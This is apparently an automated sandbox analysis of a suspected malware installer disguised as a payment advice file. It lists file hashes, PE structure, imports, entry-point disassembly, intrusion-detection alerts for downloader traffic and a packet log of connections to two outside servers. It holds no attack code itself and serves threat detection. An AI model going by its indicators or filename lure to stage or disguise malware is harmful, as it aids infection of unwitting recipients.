Preview: ...........................i.......................0..........................................................................................................................!.....m..............-....................................................5..e.~........e............ .................................................U.......0{.........B.....................*.................................................................................j...........y................p.............................................................................................a.................o.............................................K.....~.....(...........................D........t.............................................................[.&...... .............................................................m..............x.......................^...........................B...'.........k.....u................L................................................................T..........
Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
File Type: data
Category: dropped
Size (bytes): 424812
Entropy (8bit): 1.2532745203430722
Encrypted: false
SSDEEP: 768:zQN1zNkWceUPEvf5mtuQTyT0Vupr6jgDTslr7WSn3Dpbvj33BIUaE6SKCBLnSOXQ:6GkbAmorbpf6nP6e6RlY8R2KNsyB
MD5: A8D5999B820E9BA7EC8AE02AC64BD740
SHA1: 162064D1816D6723954401E5FF406FB815B1FF01
SHA-256: F3F32F4EE9A9CF103B9E6876518F46801AA187864024B28DE7F36AB7A1A00B7F
SHA-512: 6D4DC54EA8653AF4D088E8B058ED07F25F8E2B92571C688BDEBF32759DA813C34A3D5B9BCB1095619C67B5797B2881B2F227B8EA592BDCCB3870B1E8A40E1312
Malicious: false
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.656957338635434
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: PayeeAdvice_HK54912_R0038704_37504.exe
File size: 833'904 bytes
MD5: a7071c7cf3999b13607413c36e8d5418
SHA1: a4d955d14cfb368d93bc7083214b01dec4c90f2b
SHA256: 4cdbe754de2114be5f9ccf7e3f3d4f9f7f8fadc279e860bb1773aee0e2de4047
SHA512: 4680f4794735608e5594b72ed7c84e9f1af90119d76d541d3d4f27f188a1546e01d3a556d32319da58021ad886f03d67b0deae43e45b6d706b242287f9fe61ed
SSDEEP: 24576:/vYV0HT73uF4hi1qCCeFc2QCJgGNXk01vDxPVv7c:YOzaK6VcS5xhDxK
TLSH: 6A051282F5D4A16FF45284319142ED76DD6364303B6C595F77F77B2E9820282EB3822E
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
Icon Hash: 4975784d4f49613b
Entrypoint: 0x40335a
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x536FD79B [Sun May 11 20:03:39 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: e221f4f7d36469d53810a4b5f9fc8966
Signature Valid: false
Signature Issuer: CN=Graculus, O=Graculus, L=Moras, C=FR
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After:
• 06/05/2024 08:06:23, 06/05/2027 08:06:23
Subject Chain:
• CN=Graculus, O=Graculus, L=Moras, C=FR
Version: 3
Thumbprint MD5: 009B6F199CD8EB1E40CA9C929DFF6C44
Thumbprint SHA-1: 0D47AEA68183F802C3457A0DC7C4EB45B00BD110
Thumbprint SHA-256: 99AD5764C91C1F5B205F46D09E160250AA309E332F0DB1CCE79275E57B57C244
Serial: 40602E8BAA71E676C5E0E341DF92F31F789140A8
Instruction (disassembly at entrypoint):
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007FD974B4CE3Ch
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007FD974B4CAA7h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007FD974B4CA95h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007FD974B49F8Ah
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007FD974B4C4E6h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007FD974B4A04Eh
push 00000020h
pop edx
cmp cx, dx
jne 00007FD974B49F89h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007FD974B49F7Bh
add word ptr [eax], 0000h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x28c48 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc97b0 | 0x21c0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x5e68 | 0x6000 | 2f6554958e1a5093777de617d6e0bffc | False | 0.6566162109375 | data | 6.419811957742583 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x9000 | 0x202d8 | 0x600 | 9587277f9a9b39e2caf86eae07909d87 | False | 0.4733072916666667 | data | 3.757932017065988 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x2a000 | 0x29000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x53000 | 0x28c48 | 0x28e00 | 59d6061d9f9f5498351e74e1e9b8c526 | False | 0.4770761659021407 | data | 5.198121069162778 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_BITMAP | 0x53400 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
| RT_ICON | 0x53768 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.4562433455577901 |
| RT_ICON | 0x63f90 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.4870191297035947 |
| RT_ICON | 0x6d438 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | English | United States | 0.5106746765249538 |
| RT_ICON | 0x728c0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.5217879074161549 |
| RT_ICON | 0x76ae8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.5518672199170125 |
| RT_ICON | 0x79090 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.6116322701688556 |
| RT_ICON | 0x7a138 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.6635245901639344 |
| RT_ICON | 0x7aac0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.7340425531914894 |
| RT_DIALOG | 0x7af28 | 0x144 | data | English | United States | 0.5216049382716049 |
| RT_DIALOG | 0x7b070 | 0x13c | data | English | United States | 0.5506329113924051 |
| RT_DIALOG | 0x7b1b0 | 0x120 | data | English | United States | 0.5173611111111112 |
| RT_DIALOG | 0x7b2d0 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x7b3f0 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x7b4b8 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x7b518 | 0x76 | data | English | United States | 0.7542372881355932 |
| RT_VERSION | 0x7b590 | 0x3ac | data | English | United States | 0.4521276595744681 |
| RT_MANIFEST | 0x7b940 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984 |
| DLL | Import |
|---|---|
| KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte |
| USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
| ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-16T16:51:16.029541+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 51066 | 158.101.44.242 | 80 | TCP
2024-11-16T16:51:17.326339+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 51066 | 158.101.44.242 | 80 | TCP
2024-11-16T16:51:18.035886+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 51068 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:18.732541+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 51069 | 158.101.44.242 | 80 | TCP
2024-11-16T16:51:20.955066+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 51072 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:22.783425+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 51074 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:24.205191+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 51076 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:25.870768+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 51078 | 188.114.97.3 | 443 | TCP
2024-11-16T16:51:28.771956+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 51082 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2024 16:51:15.181293964 CET | 51066 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:15.186234951 CET | 80 | 51066 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:15.186316967 CET | 51066 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:15.186537027 CET | 51066 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:15.191307068 CET | 80 | 51066 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:15.831510067 CET | 80 | 51066 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:15.835869074 CET | 51066 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:15.840840101 CET | 80 | 51066 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:15.983059883 CET | 80 | 51066 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:16.029541016 CET | 51066 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:16.310859919 CET | 51067 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:16.310882092 CET | 443 | 51067 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:16.310965061 CET | 51067 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:16.314225912 CET | 51067 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:16.314241886 CET | 443 | 51067 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:16.924494982 CET | 443 | 51067 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:16.924592018 CET | 51067 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:16.928442955 CET | 51067 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:16.928473949 CET | 443 | 51067 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:16.928968906 CET | 443 | 51067 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:16.933105946 CET | 51067 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:16.979332924 CET | 443 | 51067 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:17.119944096 CET | 443 | 51067 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:17.120007992 CET | 443 | 51067 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:17.120271921 CET | 51067 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:17.127296925 CET | 51067 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:17.133250952 CET | 51066 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:17.139435053 CET | 80 | 51066 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:17.281337023 CET | 80 | 51066 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:17.284463882 CET | 51068 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:17.284559011 CET | 443 | 51068 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:17.284638882 CET | 51068 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:17.284912109 CET | 51068 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:17.284949064 CET | 443 | 51068 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:17.326339006 CET | 51066 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:17.890126944 CET | 443 | 51068 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:17.895359039 CET | 51068 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:17.895445108 CET | 443 | 51068 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:18.035876989 CET | 443 | 51068 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:18.035962105 CET | 443 | 51068 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:18.036030054 CET | 51068 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:18.036473989 CET | 51068 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:18.039686918 CET | 51066 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:18.040797949 CET | 51069 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:18.045103073 CET | 80 | 51066 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:18.045891047 CET | 80 | 51069 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:18.045960903 CET | 51066 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:18.045985937 CET | 51069 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:18.046087027 CET | 51069 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:18.050954103 CET | 80 | 51069 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:18.684346914 CET | 80 | 51069 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:18.685909986 CET | 51070 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:18.686011076 CET | 443 | 51070 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:18.686175108 CET | 51070 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:18.686533928 CET | 51070 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:18.686615944 CET | 443 | 51070 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:18.732541084 CET | 51069 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:19.309258938 CET | 443 | 51070 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:19.310945988 CET | 51070 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:19.311028957 CET | 443 | 51070 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:19.460295916 CET | 443 | 51070 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:19.460468054 CET | 443 | 51070 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:19.460644960 CET | 51070 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:19.460936069 CET | 51070 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:19.465367079 CET | 51071 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:19.470397949 CET | 80 | 51071 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:19.470498085 CET | 51071 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:19.470623016 CET | 51071 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:19.475747108 CET | 80 | 51071 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:20.201165915 CET | 80 | 51071 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:20.202604055 CET | 51072 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:20.202656031 CET | 443 | 51072 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:20.202732086 CET | 51072 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:20.202986002 CET | 51072 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:20.203002930 CET | 443 | 51072 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:20.248157978 CET | 51071 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:20.815850973 CET | 443 | 51072 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:20.817601919 CET | 51072 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:20.817652941 CET | 443 | 51072 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:20.955096960 CET | 443 | 51072 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:20.955262899 CET | 443 | 51072 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:20.955333948 CET | 51072 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:20.955760002 CET | 51072 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:20.959542990 CET | 51071 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:20.960616112 CET | 51073 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:20.964756966 CET | 80 | 51071 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:20.964827061 CET | 51071 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:20.965456963 CET | 80 | 51073 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:20.965536118 CET | 51073 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:20.965598106 CET | 51073 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:20.970380068 CET | 80 | 51073 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:21.615936041 CET | 80 | 51073 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:21.617311954 CET | 51074 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:21.617410898 CET | 443 | 51074 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:21.617522955 CET | 51074 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:21.617826939 CET | 51074 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:21.617851973 CET | 443 | 51074 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:21.670039892 CET | 51073 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:22.469273090 CET | 443 | 51074 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:22.506067038 CET | 51074 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:22.506160975 CET | 443 | 51074 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:22.783333063 CET | 443 | 51074 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:22.783505917 CET | 443 | 51074 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:22.783601999 CET | 51074 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:22.784121990 CET | 51074 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:22.791536093 CET | 51073 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:22.792325020 CET | 51075 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:22.798141003 CET | 80 | 51073 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:22.798211098 CET | 51073 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:22.798717022 CET | 80 | 51075 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:22.798778057 CET | 51075 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:22.802042961 CET | 51075 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:22.806941032 CET | 80 | 51075 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:23.446093082 CET | 80 | 51075 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:23.447832108 CET | 51076 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:23.447923899 CET | 443 | 51076 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:23.448040962 CET | 51076 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:23.448363066 CET | 51076 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:23.448411942 CET | 443 | 51076 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:23.498147964 CET | 51075 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:24.051137924 CET | 443 | 51076 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:24.053325891 CET | 51076 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:24.053414106 CET | 443 | 51076 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:24.205102921 CET | 443 | 51076 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:24.205301046 CET | 443 | 51076 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:24.205502033 CET | 51076 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:24.205883980 CET | 51076 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:24.210468054 CET | 51075 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:24.211940050 CET | 51077 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:24.215898037 CET | 80 | 51075 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:24.216095924 CET | 51075 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:24.216924906 CET | 80 | 51077 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:24.217010975 CET | 51077 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:24.217120886 CET | 51077 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:24.222135067 CET | 80 | 51077 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:25.112025976 CET | 80 | 51077 | 158.101.44.242 | 192.168.2.5
Nov 16, 2024 16:51:25.113881111 CET | 51078 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:25.113976002 CET | 443 | 51078 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:25.114228964 CET | 51078 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:25.114720106 CET | 51078 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:25.114770889 CET | 443 | 51078 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:25.154552937 CET | 51077 | 80 | 192.168.2.5 | 158.101.44.242
Nov 16, 2024 16:51:25.723787069 CET | 443 | 51078 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:25.726223946 CET | 51078 | 443 | 192.168.2.5 | 188.114.97.3
Nov 16, 2024 16:51:25.726315975 CET | 443 | 51078 | 188.114.97.3 | 192.168.2.5
